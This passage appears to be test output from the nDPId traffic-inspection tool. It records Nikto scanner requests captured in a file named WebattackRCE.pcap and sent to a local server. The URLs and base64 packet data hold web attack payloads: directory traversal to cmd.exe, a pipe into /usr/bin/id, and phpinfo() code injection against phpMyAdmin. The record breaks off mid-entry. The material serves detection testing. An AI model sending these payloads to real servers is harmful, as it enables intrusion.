00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277903,"pkt":"AAAAAAAAAAAAAAAACABFAAEFC5dAAEAGMFp\/AAABfwAAAcd4H5DWdjLSA\/QqXoAYAED++QAAAQEICp1m\/7edZv+3R0VUIC9fdnRpX2Jpbi8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzMwMikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01127{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003302)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277905,"pkt":"AAAAAAAAAAAAAAAACABFAADdGS5AAEAGIut\/AAABfwAAAcd6H5B05SBpiRPNwoAYAED+0QAAAQEICp1m\/7mdZv+5R0VUIC9hbnMucGw\/cD0uLi8uLi8uLi8uLi8uLi91c3IvYmluL2lkfCZibGFoIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01090{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277907,"pkt":"AAAAAAAAAAAAAAAACABFAADhaxBAAEAG0QR\/AAABfwAAAcd8H5CT4lJLpEBlJ4AYAED+1QAAAQEICp1m\/7udZv+7R0VUIC9hbnMvYW5zLnBsP3A9Li4vLi4vLi4vLi4vLi4vdXNyL2Jpbi9pZHwmYmxhaCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277908,"pkt":"AAAAAAAAAAAAAAAACABFAAEIG05AAEAGIKB\/AAABfwAAAcd+H5BZWCIKm5\/s0oAYAED+\/AAAAQEICp1m\/7ydZv+8R0VUIC9yZXBvcnRzL3J3c2VydmxldD9zZXJ2ZXI9cmVwc2VydityZXBvcnQ9L3RtcC9oYWNrZXIucmRmK2Rlc3R5cGU9Y2FjaGUrZGVzZm9ybWF0PVBERiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzQzNykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277909,"pkt":"AAAAAAAAAAAAAAAACABFAAC9phtAAEAGlh1\/AAABfwAAAceAH5B1J59d+HsAr4AYAED+sQAAAQEICp1m\/72dZv+9R0VUIC9vcGVuLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ4KQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277910,"pkt":"AAAAAAAAAAAAAAAACABFAADA+2VAAEAGQNB\/AAABfwAAAceCH5AHKcInz6YgT4AYAED+tAAAAQEICp1m\/76dZv++R0VUIC9meDI5aWQxLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277912,"pkt":"AAAAAAAAAAAAAAAACABFAADAC6pAAEAGMIx\/AAABfwAAAceEH5BX8jLvG2MI1oAYAED+tAAAAQEICp1m\/8CdZv\/AR0VUIC9meDI5aWQyLnR4dCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjQ1MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420277913,"pkt":"AAAAAAAAAAAAAAAACABFAAC4Ym1AAEAG2dB\/AAABfwAAAceGH5BoAlsuZzuA64AYAED+rAAAAQEICp1m\/8GdZv\/BR0VUIC8\/LXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY1MjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277917,"pkt":"AAAAAAAAAAAAAAAACABFAADBkMVAAEAGq29\/AAABfwAAAceIH5D4rqmFil0FBYAYAED+tQAAAQEICp1m\/8WdZv\/ER0VUIC9sb2dpbi5waHA\/LXMgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjUyNCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277919,"pkt":"AAAAAAAAAAAAAAAACABFAADk1ppAAEAGZXd\/AAABfwAAAceKH5AeVe\/gFGxiPoAYAED+2AAAAQEICp1m\/8adZv\/GR0VUIC8zcmRwYXJ0eS9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277920,"pkt":"AAAAAAAAAAAAAAAACABFAADbRbxAAEAG9l5\/AAABfwAAAceMH5CzBHzzJnp1p4AYAED+zwAAAQEICp1m\/8idZv\/IR0VUIC9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 